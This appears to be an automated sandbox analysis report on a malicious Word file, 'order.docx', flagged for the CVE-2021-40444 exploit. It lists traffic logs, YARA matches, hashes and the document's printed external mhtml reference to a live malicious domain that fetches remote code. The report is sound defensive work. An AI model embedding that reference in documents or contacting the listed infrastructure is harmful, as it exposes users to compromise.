C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FC65F658-05F2-4F35-9C52-226D776E880F}.tmp	dBase III DBT, version number 0, next free block index 5177357	FE62A27FE716EDD8CA556BD4BD4936B3	F16D68DCF3F5B66BC8632362A5582EC266403AA6	50EF0BFE8FAD94DF14E78769F0DD6259B960DB21348B6BBD5B5A66D94B8968DE
C:\Users\user\AppData\Local\Temp\{502EA169-3BBF-4D41-A8CE-F39114DECA2E}	data	019F974878CAE2B3FC1E26BD4B84F84D	24025E2DDB9FB1A00CC767A59E5965DC7FDAB99A	543C4D8F2C76D81913B99D569286D61D0FB1538EE499019BB6B8A3C1564F35D2
C:\Users\user\AppData\Local\Temp\{F1216906-4709-45A5-B8F3-741536BBB63B}	data	7C0D380D75B07C76F90A64BC0C0BB4C4	97263771B651F3607BA16EE1091E4E0470D0D0A1	637759E0BB88213E39C092E9150B36626FD34A2D81D3C11301EDA229B0EB6C75
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat	ASCII text, with CRLF line terminators	6E65A4A82201A6E784741E067206F0FF	D87C02C96364F566BC9D1BD0731EEABCB675D396	0DD74BE8D4947A9D214C3996F2B1DAA7489CAEF559D564888A14252FB6F62C9E
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\order.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:57 2022, mtime=Tue Mar 8 15:45:57 2022, atime=Mon Aug 1 16:49:19 2022, length=327439, window=hide	52F509E11A66BB60D5E215CECE2B2DDA	2936E51CCCE4FA3D3B96AD0A73A3601D4E1448CF	A0890DE7166F147DDC6289D55DA4E1C2E549CAF2BB94AF5EFC13C6E8BE0DAEAF
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	data	D9C8F93ADB8834E5883B5A8AAAC0D8D9	23684CCAA587C442181A92E722E15A685B2407B1	116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex	Little-endian UTF-16 Unicode text, with no line terminators	F3B25701FE362EC84616A93A45CE9998	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
C:\Users\user\Desktop\~$order.docx	data	D9C8F93ADB8834E5883B5A8AAAC0D8D9	23684CCAA587C442181A92E722E15A685B2407B1	116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11

AV Detection

Antivirus / Scanner detection for submitted sample

Source: order.docx

Avira: detected

Multi AV Scanner detection for submitted file

Source: order.docx

ReversingLabs: Detection: 69%

Exploits

Detected CVE-2021-40444 exploit

Source: document.xml.rels

Extracted files from sample: mhtml:http://polpharmar.com/test.html!x-usc:http://polpharmar.com/test.html

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Potential document exploit detected (unknown TCP traffic)

Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80

Potential document exploit detected (performs DNS queries)

Source: global traffic	DNS query: name: polpharmar.com
Source: global traffic	DNS query: name: polpharmar.com
Source: global traffic	DNS query: name: polpharmar.com
Source: global traffic	DNS query: name: polpharmar.com
Source: global traffic	DNS query: name: polpharmar.com
Source: global traffic	DNS query: name: polpharmar.com
Source: global traffic	DNS query: name: polpharmar.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /test.html HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: polpharmar.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /test.html HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: polpharmar.comIf-Modified-Since: Sun, 31 Jul 2022 09:45:54 GMTConnection: Keep-Alive

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: THCPROJECTSRO THCPROJECTSRO

Source: ~WRS{FC65F658-05F2-4F35-9C52-226D776E880F}.tmp.0.dr	String found in binary or memory: http://polpharmar.com/test.html
Source: ~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.dr	String found in binary or memory: http://polpharmar.com/test.html%
Source: ~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.dr	String found in binary or memory: http://polpharmar.com/test.html%x-usc:http://polpharmar.com/test.html
Source: ~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.dr	String found in binary or memory: http://polpharmar.com/test.htmlyX

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{45FF0D1D-AF9D-41F4-B5D7-9125F330AE9F}.tmp

Jump to behavior

Source: unknown

DNS traffic detected: queries for: polpharmar.com

Source: global traffic	HTTP traffic detected: GET /test.html HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: polpharmar.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /test.html HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: polpharmar.comIf-Modified-Since: Sun, 31 Jul 2022 09:45:54 GMTConnection: Keep-Alive

Yara signature match

Source: document.xml.rels, type: SAMPLE	Matched rule: SUSP_Doc_WordXMLRels_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, Wojciech Cieslak, description = Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-06-20, hash = 62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0
Source: document.xml.rels, type: SAMPLE	Matched rule: EXPL_CVE_2021_40444_Document_Rels_XML date = 2021-09-10, author = Jeremy Brown / @alteredbytes, description = Detects indicators found in weaponized documents that exploit CVE-2021-40444, reference = https://twitter.com/AlteredBytes/status/1435811407249952772

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: ~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: order.docx

ReversingLabs: Detection: 69%

Source: order.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\order.docx

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$order.docx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR74D1.tmp

Jump to behavior

Source: classification engine

Classification label: mal68.expl.evad.winDOCX@1/20@7/1

Source: ~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.dr	OLE document summary: edited time not present or 0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: order.docx

Initial sample: OLE zip file path = word/media/image1.jpg

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: ~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

Contains an external reference to another file

Source: document.xml.rels

Extracted files from sample: mhtml:http://polpharmar.com/test.html!x-usc:http://polpharmar.com/test.html

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

ID:	676557
Product:	CloudBasic
Start time:	10:48:37
Start date:	01.08.2022
Sample:	order.docx
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	8abea2d6c14af54c6eac09d158554085
SHA1:	3802d9c8b3530fe7b140cbd4a12c3895c46077b2
SHA256:	aa26ed65b5b05b28fa8c56df8c0d87e6bfd8b98f962824293acce14d03cd3412
Filetype:	Word Microsoft Office Open XML Format document (49504/1) 49.01%

Windows Analysis Report
order.docx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report order.docx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
order.docx